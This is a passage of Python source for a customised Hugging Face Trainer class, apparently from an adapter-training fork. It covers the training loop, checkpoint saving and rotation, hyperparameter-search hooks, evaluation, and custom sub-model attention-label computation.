epoch: int, metrics: Dict[str, float] ): if self.hp_search_backend is None or trial is None: return self.objective = self.compute_objective(metrics.copy()) if self.hp_search_backend == HPSearchBackend.OPTUNA: trial.report(self.objective, epoch) if trial.should_prune(): raise optuna.TrialPruned() elif self.hp_search_backend == HPSearchBackend.RAY: if self.state.global_step % self.args.save_steps == 0: self._tune_save_checkpoint() tune.report(objective=self.objective, **metrics) def _tune_save_checkpoint(self): if not self.use_tune_checkpoints: return with tune.checkpoint_dir(step=self.state.global_step) as checkpoint_dir: self.args.output_dir = checkpoint_dir output_dir = os.path.join(self.args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{self.state.global_step}") self.save_model(output_dir) if self.is_world_master(): self.state.save_to_json(os.path.join(output_dir, "trainer_state.json")) torch.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) torch.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) def call_model_init(self, trial=None): model_init_argcount = len(inspect.signature(self.model_init).parameters) if model_init_argcount == 0: model = self.model_init() elif model_init_argcount == 1: model = self.model_init(trial) else: raise RuntimeError("model_init should have 0 or 1 argument.") if model is None: raise RuntimeError("model_init should not return None.") return model def train(self, model_path: Optional[str] = None, trial: Union["optuna.Trial", Dict[str, Any]] = None): """ Main training entry point. Args: model_path (:obj:`str`, `optional`): Local path to the model if the model to train has been instantiated from a local path. If present, training will resume from the optimizer/scheduler states loaded here. trial (:obj:`optuna.Trial` or :obj:`Dict[str, Any]`, `optional`): The trial run or the hyperparameter dictionary for hyperparameter search. """ # This might change the seed so needs to run first. self._hp_search_setup(trial) # Model re-init if self.model_init is not None: # Seed must be set before instantiating the model when using model_init. set_seed(self.args.seed) model = self.call_model_init(trial) self.model = model.to(self.args.device) # Reinitializes optimizer and scheduler self.optimizer, self.lr_scheduler = None, None # Keeping track whether we can can len() on the dataset or not train_dataset_is_sized = isinstance(self.train_dataset, collections.abc.Sized) # Data loader and number of training steps train_dataloader = self.get_train_dataloader() # Setting up training control variables: # number of training epochs: num_train_epochs # number of training steps per epoch: num_update_steps_per_epoch # total number of training steps to execute: max_steps if train_dataset_is_sized: num_update_steps_per_epoch = len(train_dataloader) // self.args.gradient_accumulation_steps num_update_steps_per_epoch = max(num_update_steps_per_epoch, 1) if self.args.max_steps > 0: max_steps = self.args.max_steps num_train_epochs = self.args.max_steps // num_update_steps_per_epoch + int( self.args.max_steps % num_update_steps_per_epoch > 0 ) else: max_steps = math.ceil(self.args.num_train_epochs * num_update_steps_per_epoch) num_train_epochs = math.ceil(self.args.num_train_epochs) else: # see __init__. max_steps is set when the dataset has no __len__ max_steps = self.args.max_steps num_train_epochs = 1 num_update_steps_per_epoch = max_steps self.create_optimizer_and_scheduler(num_training_steps=max_steps) self.state = TrainerState() self.state.is_hyper_param_search = trial is not None # Check if saved optimizer or scheduler states exist self._load_optimizer_and_scheduler(model_path) # Mixed precision training with apex (torch < 1.6) model = self.model sub_model_list = self.sub_model_list if self.sub_model_list is not None else None if self.args.fp16 and _use_apex: if not is_apex_available(): raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.") model, self.optimizer = amp.initialize(model, self.optimizer, opt_level=self.args.fp16_opt_level) # Multi-gpu training (should be after apex fp16 initialization) if self.args.n_gpu > 1: model = torch.nn.DataParallel(model) if sub_model_list is not None: for s_index, sub_model in enumerate(sub_model_list): sub_model_list[s_index] = torch.nn.DataParallel(sub_model) print("pooh pararell worked") # Distributed training (should be after apex fp16 initialization) if self.args.local_rank != -1: model = torch.nn.parallel.DistributedDataParallel( model, device_ids=[self.args.local_rank], output_device=self.args.local_rank, find_unused_parameters=( not getattr(model.config, "gradient_checkpointing", False) if isinstance(model, PreTrainedModel) else True ), ) # find_unused_parameters breaks checkpointing as per # https://github.com/huggingface/transformers/pull/4659#issuecomment-643356021 # Train! if is_torch_tpu_available(): total_train_batch_size = self.args.train_batch_size * xm.xrt_world_size() else: total_train_batch_size = ( self.args.train_batch_size * self.args.gradient_accumulation_steps * (torch.distributed.get_world_size() if self.args.local_rank != -1 else 1) ) num_examples = ( self.num_examples(train_dataloader) if train_dataset_is_sized else total_train_batch_size * self.args.max_steps ) logger.info("***** Running training *****") logger.info(" Num examples = %d", num_examples) logger.info(" Num Epochs = %d", num_train_epochs) logger.info(" Instantaneous batch size per device = %d", self.args.per_device_train_batch_size) logger.info(" Total train batch size (w. parallel, distributed & accumulation) = %d", total_train_batch_size) logger.info(" Gradient Accumulation steps = %d", self.args.gradient_accumulation_steps) logger.info(" Total optimization steps = %d", max_steps) self.state.epoch = 0 epochs_trained = 0 steps_trained_in_current_epoch = 0 # Check if continuing training from a checkpoint if model_path and os.path.isfile(os.path.join(model_path, "trainer_state.json")): self.state = TrainerState.load_from_json(os.path.join(model_path, "trainer_state.json")) epochs_trained = self.state.global_step // num_update_steps_per_epoch steps_trained_in_current_epoch = self.state.global_step % (num_update_steps_per_epoch) logger.info(" Continuing training from checkpoint, will skip to saved global_step") logger.info(" Continuing training from epoch %d", epochs_trained) logger.info(" Continuing training from global step %d", self.state.global_step) logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch) # Update the references self.callback_handler.model = self.model self.callback_handler.optimizer = self.optimizer self.callback_handler.lr_scheduler = self.lr_scheduler self.callback_handler.train_dataloader = train_dataloader self.state.trial_name = self.hp_name(trial) if self.hp_name is not None else None self.state.trial_params = hp_params(trial) if trial is not None else None # This should be the same if the state has been saved but in case the training arguments changed, it's safer # to set this after the load. self.state.max_steps = max_steps self.state.num_train_epochs = num_train_epochs self.state.is_local_process_zero = self.is_local_process_zero() self.state.is_world_process_zero = self.is_world_process_zero() tr_loss = torch.tensor(0.0).to(self.args.device) self._logging_loss_scalar = 0 self._globalstep_last_logged = 0 self._total_flos = self.state.total_flos model.zero_grad() self.control = self.callback_handler.on_train_begin(self.args, self.state, self.control) for epoch in range(epochs_trained, num_train_epochs): if isinstance(train_dataloader, DataLoader) and isinstance(train_dataloader.sampler, DistributedSampler): train_dataloader.sampler.set_epoch(epoch) if is_torch_tpu_available(): parallel_loader = pl.ParallelLoader(train_dataloader, [self.args.device]).per_device_loader( self.args.device ) epoch_iterator = parallel_loader else: epoch_iterator = train_dataloader # Reset the past mems state at the beginning of each epoch if necessary. if self.args.past_index >= 0: self._past = None steps_in_epoch = len(epoch_iterator) if train_dataset_is_sized else self.args.max_steps self.control = self.callback_handler.on_epoch_begin(self.args, self.state, self.control) for step, inputs in enumerate(epoch_iterator): # Skip past any already trained steps if resuming training if steps_trained_in_current_epoch > 0: steps_trained_in_current_epoch -= 1 continue if (step + 1) % self.args.gradient_accumulation_steps == 0: self.control = self.callback_handler.on_step_begin(self.args, self.state, self.control) if ( ((step + 1) % self.args.gradient_accumulation_steps != 0) and self.args.local_rank != -1 and _use_ddp_no_sync ): with model.no_sync(): tr_loss += self.training_step(model, inputs) else: if sub_model_list is not None : tr_loss += self.training_step(model, inputs, sub_model_list, step, epoch) else: tr_loss += self.training_step(model, inputs) self._total_flos += self.floating_point_ops(inputs) if (step + 1) % self.args.gradient_accumulation_steps == 0 or ( # last step in epoch but step is always smaller than gradient_accumulation_steps steps_in_epoch <= self.args.gradient_accumulation_steps and (step + 1) == steps_in_epoch ): # apply adapter fusion weight regularization on the value matrix if ( hasattr(self.model.config, "adapter_fusion") and self.model.config.adapter_fusion["regularization"] ): fusion_reg_loss = self.model.base_model.get_fusion_regularization_loss() fusion_reg_loss.backward() if self.args.fp16 and _use_native_amp: self.scaler.unscale_(self.optimizer) torch.nn.utils.clip_grad_norm_(model.parameters(), self.args.max_grad_norm) elif self.args.fp16 and _use_apex: torch.nn.utils.clip_grad_norm_(amp.master_params(self.optimizer), self.args.max_grad_norm) else: torch.nn.utils.clip_grad_norm_(model.parameters(), self.args.max_grad_norm) if is_torch_tpu_available(): xm.optimizer_step(self.optimizer) elif self.args.fp16 and _use_native_amp: self.scaler.step(self.optimizer) self.scaler.update() else: self.optimizer.step() self.lr_scheduler.step() model.zero_grad() self.state.global_step += 1 self.state.epoch = epoch + (step + 1) / steps_in_epoch self.control = self.callback_handler.on_step_end(self.args, self.state, self.control) self._maybe_log_save_evaluate(tr_loss, model, trial, epoch) if self.control.should_epoch_stop or self.control.should_training_stop: break self.control = self.callback_handler.on_epoch_end(self.args, self.state, self.control) self._maybe_log_save_evaluate(tr_loss, model, trial, epoch) if self.args.tpu_metrics_debug or self.args.debug: if is_torch_tpu_available(): # tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.) xm.master_print(met.metrics_report()) else: logger.warning( "You enabled PyTorch/XLA debug metrics but you don't have a TPU " "configured. Check your training configuration if this is unexpected." ) if self.control.should_training_stop: break if self.args.past_index and hasattr(self, "_past"): # Clean the state at the end of training delattr(self, "_past") if self.do_save_adapters: logger.info("\n\nTraining completed. Do not forget to share your adapters on https://adapterhub.ml =)\n\n") else: logger.info("\n\nTraining completed. Do not forget to share your model on huggingface.co/models =)\n\n") if self.args.load_best_model_at_end and self.state.best_model_checkpoint is not None: if self.do_save_full_model: logger.info( f"Loading best model from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." ) if isinstance(model, PreTrainedModel): self.model = model.from_pretrained(self.state.best_model_checkpoint) else: state_dict = torch.load(os.path.join(self.state.best_model_checkpoint, WEIGHTS_NAME)) self.model.load_state_dict(state_dict) if self.do_save_adapters: logger.info( f"Loading best adapter(s) from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." ) # attempt to re-load all adapters from checkpoint for adapter in self.model.config.adapters.adapters: adapter_dir = os.path.join(self.state.best_model_checkpoint, adapter) if os.path.exists(adapter_dir): self.model.load_adapter(adapter_dir) if self.do_save_adapter_fusion: logger.info( f"Loading best adapter fusion(s) from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." ) # attempt to re-load all adapter fusions from checkpoint for fusion in self.model.config.adapter_fusion_models: fusion_dir = os.path.join(self.state.best_model_checkpoint, fusion) if os.path.exists(fusion_dir): self.model.load_adapter_fusion(fusion_dir) self.model = self.model.to(self.args.device) if self._total_flos is not None: self.store_flos() self.log({"total_flos": self.state.total_flos}) self.control = self.callback_handler.on_train_end(self.args, self.state, self.control) return TrainOutput(self.state.global_step, tr_loss.item() / self.state.global_step) def _maybe_log_save_evaluate(self, tr_loss, model, trial, epoch): if self.control.should_log: logs: Dict[str, float] = {} tr_loss_scalar = tr_loss.item() logs["loss"] = (tr_loss_scalar - self._logging_loss_scalar) / ( self.state.global_step - self._globalstep_last_logged ) # backward compatibility for pytorch schedulers logs["learning_rate"] = ( self.lr_scheduler.get_last_lr()[0] if version.parse(torch.__version__) >= version.parse("1.4") else self.lr_scheduler.get_lr()[0] ) self._logging_loss_scalar = tr_loss_scalar self._globalstep_last_logged = self.state.global_step self.log(logs) metrics = None if self.control.should_evaluate: metrics = self.evaluate() self._report_to_hp_search(trial, epoch, metrics) if self.control.should_save: self._save_checkpoint(model, trial, metrics=metrics) self.control = self.callback_handler.on_save(self.args, self.state, self.control) def _save_checkpoint(self, model, trial, metrics=None): # In all cases (even distributed/parallel), self.model is always a reference # to the model we want to save. if hasattr(model, "module"): assert model.module is self.model, f"Module {model.module} should be a reference to self.model" else: assert model is self.model, f"Model {model} should be a reference to self.model" # Save model checkpoint checkpoint_folder = f"{PREFIX_CHECKPOINT_DIR}-{self.state.global_step}" if self.hp_search_backend is not None and trial is not None: run_id = trial.number if self.hp_search_backend == HPSearchBackend.OPTUNA else tune.get_trial_id() run_name = self.hp_name(trial) if self.hp_name is not None else f"run-{run_id}" output_dir = os.path.join(self.args.output_dir, run_name, checkpoint_folder) else: output_dir = os.path.join(self.args.output_dir, checkpoint_folder) self.store_flos() self.save_model(output_dir) # Save optimizer and scheduler if is_torch_tpu_available(): xm.rendezvous("saving_optimizer_states") xm.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) with warnings.catch_warnings(record=True) as caught_warnings: xm.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) reissue_pt_warnings(caught_warnings) elif self.is_world_process_zero(): torch.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) with warnings.catch_warnings(record=True) as caught_warnings: torch.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) reissue_pt_warnings(caught_warnings) # Determine the new best metric / best model checkpoint if metrics is not None and self.args.metric_for_best_model is not None: metric_to_check = self.args.metric_for_best_model if not metric_to_check.startswith("eval_"): metric_to_check = f"eval_{metric_to_check}" metric_value = metrics[metric_to_check] operator = np.greater if self.args.greater_is_better else np.less if ( self.state.best_metric is None or self.state.best_model_checkpoint is None or operator(metric_value, self.state.best_metric) ): self.state.best_metric = metric_value self.state.best_model_checkpoint = output_dir # Save the Trainer state if self.is_world_process_zero(): self.state.save_to_json(os.path.join(output_dir, "trainer_state.json")) # Maybe delete some older checkpoints. if self.is_world_process_zero(): self._rotate_checkpoints(use_mtime=True) def _load_optimizer_and_scheduler(self, model_path): """If optimizer and scheduler states exist, load them.""" if ( model_path is not None and os.path.isfile(os.path.join(model_path, "optimizer.pt")) and os.path.isfile(os.path.join(model_path, "scheduler.pt")) ): # Load in optimizer and scheduler states if is_torch_tpu_available(): # On TPU we have to take some extra precautions to properly load the states on the right device. optimizer_state = torch.load(os.path.join(model_path, "optimizer.pt"), map_location="cpu") with warnings.catch_warnings(record=True) as caught_warnings: lr_scheduler_state = torch.load(os.path.join(model_path, "scheduler.pt"), map_location="cpu") reissue_pt_warnings(caught_warnings) xm.send_cpu_data_to_device(optimizer_state, self.args.device) xm.send_cpu_data_to_device(lr_scheduler_state, self.args.device) self.optimizer.load_state_dict(optimizer_state) self.lr_scheduler.load_state_dict(lr_scheduler_state) else: self.optimizer.load_state_dict( torch.load(os.path.join(model_path, "optimizer.pt"), map_location=self.args.device) ) with warnings.catch_warnings(record=True) as caught_warnings: self.lr_scheduler.load_state_dict(torch.load(os.path.join(model_path, "scheduler.pt"))) reissue_pt_warnings(caught_warnings) def hyperparameter_search( self, hp_space: Optional[Callable[["optuna.Trial"], Dict[str, float]]] = None, compute_objective: Optional[Callable[[Dict[str, float]], float]] = None, n_trials: int = 20, direction: str = "minimize", backend: Optional[Union["str", HPSearchBackend]] = None, hp_name: Optional[Callable[["optuna.Trial"], str]] = None, **kwargs ) -> BestRun: """ Launch an hyperparameter search using ``optuna`` or ``Ray Tune``. The optimized quantity is determined by :obj:`compute_objectie`, which defaults to a function returning the evaluation loss when no metric is provided, the sum of all metrics otherwise. .. warning:: To use this method, you need to have provided a ``model_init`` when initializing your :class:`~transformers.Trainer`: we need to reinitialize the model at each new run. This is incompatible with the ``optimizers`` argument, so you need to subclass :class:`~transformers.Trainer` and override the method :meth:`~transformers.Trainer.create_optimizer_and_scheduler` for custom optimizer/scheduler. Args: hp_space (:obj:`Callable[["optuna.Trial"], Dict[str, float]]`, `optional`): A function that defines the hyperparameter search space. Will default to :func:`~transformers.trainer_utils.default_hp_space_optuna` or :func:`~transformers.trainer_utils.default_hp_space_ray` depending on your backend. compute_objective (:obj:`Callable[[Dict[str, float]], float]`, `optional`): A function computing the objective to minimize or maximize from the metrics returned by the :obj:`evaluate` method. Will default to :func:`~transformers.trainer_utils.default_compute_objective`. n_trials (:obj:`int`, `optional`, defaults to 100): The number of trial runs to test. direction(:obj:`str`, `optional`, defaults to :obj:`"minimize"`): Whether to optimize greater or lower objects. Can be :obj:`"minimize"` or :obj:`"maximize"`, you should pick :obj:`"minimize"` when optimizing the validation loss, :obj:`"maximize"` when optimizing one or several metrics. backend(:obj:`str` or :class:`~transformers.training_utils.HPSearchBackend`, `optional`): The backend to use for hyperparameter search. Will default to optuna or Ray Tune, depending on which one is installed. If both are installed, will default to optuna. kwargs: Additional keyword arguments passed along to :obj:`optuna.create_study` or :obj:`ray.tune.run`. For more information see: - the documentation of `optuna.create_study <https://optuna.readthedocs.io/en/stable/reference/alias_generated/optuna.create_study.html#optuna.create_study>`__ - the documentation of `tune.run <https://docs.ray.io/en/latest/tune/api_docs/execution.html#tune-run>`__ Returns: :class:`transformers.trainer_utils.BestRun`: All the information about the best run. """ if backend is None: backend = default_hp_search_backend() if backend is None: raise RuntimeError( "At least one of optuna or ray should be installed. " "To install optuna run `pip install optuna`." "To install ray run `pip install ray[tune]`." ) backend = HPSearchBackend(backend) if backend == HPSearchBackend.OPTUNA and not is_optuna_available(): raise RuntimeError("You picked the optuna backend, but it is not installed. Use `pip install optuna`.") if backend == HPSearchBackend.RAY and not is_ray_available(): raise RuntimeError( "You picked the Ray Tune backend, but it is not installed. Use `pip install 'ray[tune]'`." ) self.hp_search_backend = backend if self.model_init is None: raise RuntimeError( "To use hyperparameter search, you need to pass your model through a model_init function." ) self.hp_space = default_hp_space[backend] if hp_space is None else hp_space self.hp_name = hp_name self.compute_objective = default_compute_objective if compute_objective is None else compute_objective run_hp_search = run_hp_search_optuna if backend == HPSearchBackend.OPTUNA else run_hp_search_ray best_run = run_hp_search(self, n_trials, direction, **kwargs) self.hp_search_backend = None return best_run def log(self, logs: Dict[str, float]) -> None: """ Log :obj:`logs` on the various objects watching training. Subclass and override this method to inject custom behavior. Args: logs (:obj:`Dict[str, float]`): The values to log. """ if hasattr(self, "_log"): warnings.warn( "The `_log` method is deprecated and won't be called in a future version, define `log` in your subclass.", FutureWarning, ) return self._log(logs) if self.state.epoch is not None: logs["epoch"] = self.state.epoch self.control = self.callback_handler.on_log(self.args, self.state, self.control, logs) output = {**logs, **{"step": self.state.global_step}} self.state.log_history.append(output) def _prepare_inputs(self, inputs: Dict[str, Union[torch.Tensor, Any]]) -> Dict[str, Union[torch.Tensor, Any]]: """ Prepare :obj:`inputs` before feeding them to the model, converting them to tensors if they are not already and handling potential state. """ for k, v in inputs.items(): if isinstance(v, torch.Tensor): inputs[k] = v.to(self.args.device) if self.args.past_index >= 0 and self._past is not None: inputs["mems"] = self._past if self.adapter_names: inputs["adapter_names"] = self.adapter_names return inputs def training_step(self, model: nn.Module, inputs: Dict[str, Union[torch.Tensor, Any]], sub_model_list: List[nn.Module] = None, step=None, epoch=None) -> torch.Tensor: """ Perform a training step on a batch of inputs. Subclass and override to inject custom behavior. Args: model (:obj:`nn.Module`): The model to train. inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. The dictionary will be unpacked before being fed to the model. Most models expect the targets under the argument :obj:`labels`. Check your model's documentation for all accepted arguments. Return: :obj:`torch.Tensor`: The tensor with training loss on this batch. """ if hasattr(self, "_training_step"): warnings.warn( "The `_training_step` method is deprecated and won't be called in a future version, define `training_step` in your subclass.", FutureWarning, ) return self._training_step(model, inputs, self.optimizer, step) model.train() if sub_model_list is not None: for sub_model in sub_model_list: sub_model.eval() inputs = self._prepare_inputs(inputs) if self.args.fp16 and _use_native_amp: with autocast(): loss = self.compute_loss(model, inputs) else: if sub_model_list is not None: loss = self.compute_loss(model, inputs, sub_model_list, step, epoch) else: loss = self.compute_loss(model, inputs) if self.args.n_gpu > 1: loss = loss.mean() # mean() to average on multi-gpu parallel training if self.args.gradient_accumulation_steps > 1: loss = loss / self.args.gradient_accumulation_steps if self.args.fp16 and _use_native_amp: self.scaler.scale(loss).backward() elif self.args.fp16 and _use_apex: with amp.scale_loss(loss, self.optimizer) as scaled_loss: scaled_loss.backward() else: loss.backward() return loss.detach() def compute_loss(self, model, inputs, sub_model_list=None, step=None, epoch=None): """ How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for customs behavior. """ if sub_model_list is not None: #multi label # attention_label = self._multi_label(sub_model_list, inputs) #single label attention_label = self._single_label(sub_model_list, inputs) # attention_label = self._negative_single_label(sub_model_list, inputs) else: attention_label = None outputs = model(**inputs,attention_label=attention_label, step=step, epoch=epoch) # Save past state if it exists if self.args.past_index >= 0: self._past = outputs[self.args.past_index] # We don't use .loss here since the model may return tuples instead of ModelOutput. return outputs[0] def _multi_label(self, sub_model_list, inputs): attention_label_list = [] for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) preds = torch.argmax(logits, axis=-1) b_preds = [int(torch.eq(preds[i],labels[i]).item()) for i in range(labels.shape[-1])] attention_label_list.append(b_preds) attention_label = torch.tensor(attention_label_list).transpose(-1,0) # attention_label =[batch_num,answer_choice_num] return attention_label def _single_label(self, sub_model_list, inputs): logit_list = [] c_labels = None for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) s_logits = nn.Softmax(dim=-1)(logits) logit_list.append(s_logits) if c_labels is not None: assert (torch.equal(c_labels, labels)), "labels between sub models are different." c_labels = labels stack_all = torch.stack(logit_list) attention_label_list = [] for i in range(stack_all.shape[1]): answer_index = None best_var = 0 for j in range(stack_all.shape[0]): if torch.argmax(stack_all[j][i], dim=-1) == c_labels[i].item(): if torch.std(stack_all[j][i]).item() > best_var: best_var = torch.std(stack_all[j][i]).item() answer_index = j attention_label_list.append(answer_index) attention_label = [] for answer_label in attention_label_list: exp_label = [] for choice in range(stack_all.shape[0]): if answer_label == choice: exp_label.append(1) else: exp_label.append(0) attention_label.append(exp_label) attention_label = torch.tensor(attention_label) # attention_label =[8,3] return attention_label def _negative_single_label(self, sub_model_list, inputs): logit_list = [] c_labels = None for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) s_logits = nn.Softmax(dim=-1)(logits) logit_list.append(s_logits) if c_labels is not None: assert (torch.equal(c_labels, labels)), "labels between sub models are different." c_labels = labels stack_all = torch.stack(logit_list) attention_label_list = [] for i in range(stack_all.shape[1]): answer_index = None wrong_index = None best_var = 0 worst_var = 0 for j in range(stack_all.shape[0]): if torch.argmax(stack_all[j][i], dim=-1) == c_labels[i].item(): if torch.std(stack_all[j][i]).item() > best_var: best_var = torch.std(stack_all[j][i]).item() answer_index = j else: if torch.std(stack_all[j][i]).item() > worst_var: worst_var = torch.std(stack_all[j][i]).item() wrong_index = j attention_label_list.append((answer_index, wrong_index)) attention_label = [] for (answer_label, wrong_label) in attention_label_list: exp_label = [] for choice in range(stack_all.shape[0]): if answer_label == choice: exp_label.append(1) elif wrong_label == choice: exp_label.append(-1) else: exp_label.append(0) attention_label.append(exp_label) attention_label = torch.tensor(attention_label) # attention_label =[8,3] return attention_label def is_local_master(self) -> bool: """ Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on several machines) main process. .. warning:: This method is deprecated, use :meth:`~transformers.Trainer.is_local_process_zero` instead. """ warnings.warn("This method is deprecated, use `Trainer.is_local_process_zero()` instead.", FutureWarning) return self.is_local_process_zero() def is_local_process_zero(self) -> bool: """ Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on several machines) main process. """ if is_torch_tpu_available(): return xm.is_master_ordinal(local=True) else: return self.args.local_rank in [-1, 0] def is_world_master(self) -> bool: """ Whether or not this process is the global main process (when training in a distributed fashion on several machines, this is only going to be :obj:`True` for one process). .. warning:: This method is deprecated, use :meth:`~transformers.Trainer.is_world_process_zero` instead. """ warnings.warn("This method is deprecated, use `Trainer.is_world_process_zero()` instead.", FutureWarning) return self.is_world_process_zero() def is_world_process_zero(self) -> bool: """ Whether or not this process is the global main process (when training in a distributed fashion on several machines, this is only going to be :obj:`True` for one process). """ if is_torch_tpu_available(): return xm.is_master_ordinal(local=False) else: return self.args.local_rank == -1 or torch.distributed.get_rank() == 0 def save_model(self, output_dir: Optional[str] = None): """ Will save the model, so you can reload it using :obj:`from_pretrained()`. Will only save from the world_master process (unless in TPUs). """ if is_torch_tpu_available(): self._save_tpu(output_dir) elif self.is_world_process_zero(): self._save(output_dir) def _save_tpu(self, output_dir: Optional[str] = None): output_dir = output_dir if output_dir is not None else self.args.output_dir logger.info("Saving model checkpoint to %s", output_dir) if xm.is_master_ordinal(): os.makedirs(output_dir, exist_ok=True) torch.save(self.args, os.path.join(output_dir, "training_args.bin")) # Save a trained model and configuration using `save_pretrained()`. # They can then be reloaded using `from_pretrained()` xm.rendezvous("saving_checkpoint") if not isinstance(self.model, PreTrainedModel): logger.info("Trainer.model is not a `PreTrainedModel`, only saving its state dict.") state_dict = self.model.state_dict() xm.save(state_dict, os.path.join(output_dir, WEIGHTS_NAME)) else: if self.do_save_adapters: self.model.save_all_adapters(output_dir) if self.do_save_adapter_fusion: self.model.save_all_adapter_fusions(output_dir) if self.do_save_full_model: self.model.save_pretrained(output_dir) if self.tokenizer is not None and self.is_world_process_zero(): self.tokenizer.save_pretrained(output_dir) def _save(self, output_dir: Optional[str] = None): output_dir = output_dir if output_dir is not None else self.args.output_dir os.makedirs(output_dir, exist_ok=True) logger.info("Saving model checkpoint to %s", output_dir) # Save a trained model and configuration using `save_pretrained()`. # They can then be reloaded using `from_pretrained()` if not isinstance(self.model, PreTrainedModel): logger.info("Trainer.model is not a `PreTrainedModel`, only saving its state dict.") state_dict = self.model.state_dict() torch.save(state_dict, os.path.join(output_dir, WEIGHTS_NAME)) else: if self.do_save_adapters: self.model.save_all_adapters(output_dir) if self.do_save_adapter_fusion: self.model.save_all_adapter_fusions(output_dir) if self.do_save_full_model: self.model.save_pretrained(output_dir) if self.tokenizer is not None and self.is_world_process_zero(): self.tokenizer.save_pretrained(output_dir) # Good practice: save your training arguments together with the trained model torch.save(self.args, os.path.join(output_dir, "training_args.bin")) def store_flos(self): # Storing the number of floating-point operations that went into the model if self._total_flos is not None: if self.args.local_rank != -1: self.state.total_flos = distributed_broadcast_scalars([self._total_flos]).sum().item() else: self.state.total_flos = self._total_flos def _sorted_checkpoints(self, checkpoint_prefix=PREFIX_CHECKPOINT_DIR, use_mtime=False) -> List[str]: ordering_and_checkpoint_path = [] glob_checkpoints = [str(x) for x in Path(self.args.output_dir).glob(f"{checkpoint_prefix}-*")] for path in glob_checkpoints: if use_mtime: ordering_and_checkpoint_path.append((os.path.getmtime(path), path)) else: regex_match = re.match(f".*{checkpoint_prefix}-([0-9]+)", path) if regex_match and regex_match.groups(): ordering_and_checkpoint_path.append((int(regex_match.groups()[0]), path)) checkpoints_sorted = sorted(ordering_and_checkpoint_path) checkpoints_sorted = [checkpoint[1] for checkpoint in checkpoints_sorted] # Make sure we don't delete the best model. if self.state.best_model_checkpoint is not None: best_model_index = checkpoints_sorted.index(str(Path(self.state.best_model_checkpoint))) checkpoints_sorted[best_model_index], checkpoints_sorted[-1] = ( checkpoints_sorted[-1], checkpoints_sorted[best_model_index], ) return checkpoints_sorted def _rotate_checkpoints(self, use_mtime=False) -> None: if self.args.save_total_limit is None or self.args.save_total_limit <= 0: return # Check if we should delete older checkpoint(s) checkpoints_sorted = self._sorted_checkpoints(use_mtime=use_mtime) if len(checkpoints_sorted) <= self.args.save_total_limit: return number_of_checkpoints_to_delete = max(0, len(checkpoints_sorted) - self.args.save_total_limit) checkpoints_to_be_deleted = checkpoints_sorted[:number_of_checkpoints_to_delete] for checkpoint in checkpoints_to_be_deleted: logger.info("Deleting older checkpoint [{}] due to args.save_total_limit".format(checkpoint)) shutil.rmtree(checkpoint) def evaluate(self, eval_dataset: Optional[Dataset] = None) -> Dict[str, float]: """ Run evaluation and returns metrics. The calling script will be responsible for providing a method to compute metrics, as they are task-dependent (pass it to the init :obj:`compute_metrics` argument). You can also subclass and override this method to inject custom behavior. Args: eval_dataset (:obj:`Dataset`, `optional`): Pass a dataset if you wish to override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement the :obj:`__len__` method. Returns: A dictionary containing the evaluation loss and the potential metrics computed from the predictions. The dictionary also contains the epoch number which comes from the training state. """ if eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") eval_dataloader = self.get_eval_dataloader(eval_dataset) output = self.prediction_loop( eval_dataloader, description="Evaluation", # No point gathering the predictions if there are no metrics, otherwise we defer to # self.args.prediction_loss_only prediction_loss_only=True if self.compute_metrics is None else None, ) self.log(output.metrics) if self.args.tpu_metrics_debug or self.args.debug: # tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.) xm.master_print(met.metrics_report()) self.control = self.callback_handler.on_evaluate(self.args, self.state, self.control, output.metrics) return output.metrics def predict(self, test_dataset: Dataset) -> PredictionOutput: """ Run prediction and returns predictions and potential metrics. Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method will also return metrics, like in :obj:`evaluate()`. Args: test_dataset (:obj:`Dataset`): Dataset to run the predictions on. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. Has to implement the method :obj:`__len__` .. note:: If your predictions or labels have different sequence length (for instance because you're doing dynamic padding in a token classification task) the predictions will be padded (on the right) to allow for concatenation into one array. The padding index is -100. Returns: `NamedTuple` A namedtuple with the following keys: - predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`. - label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some). - metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset contained labels). """ if test_dataset is not None and not isinstance(test_dataset, collections.abc.Sized): raise ValueError("test_dataset must implement __len__") test_dataloader = self.get_test_dataloader(test_dataset) return self.prediction_loop(test_dataloader, description="Prediction") def prediction_loop( self, dataloader: DataLoader, description: str, prediction_loss_only: Optional[bool] = None ) -> PredictionOutput: """ Prediction/evaluation loop, shared by :obj:`Trainer.evaluate()` and :obj:`Trainer.predict()`. Works both with or without labels. """ if hasattr(self, "_prediction_loop"): warnings.warn( "The `_prediction_loop` method is deprecated and won't be called in a future version, define `prediction_loop` in your subclass.", FutureWarning, ) return self._prediction_loop(dataloader, description, prediction_loss_only=prediction_loss_only) if not 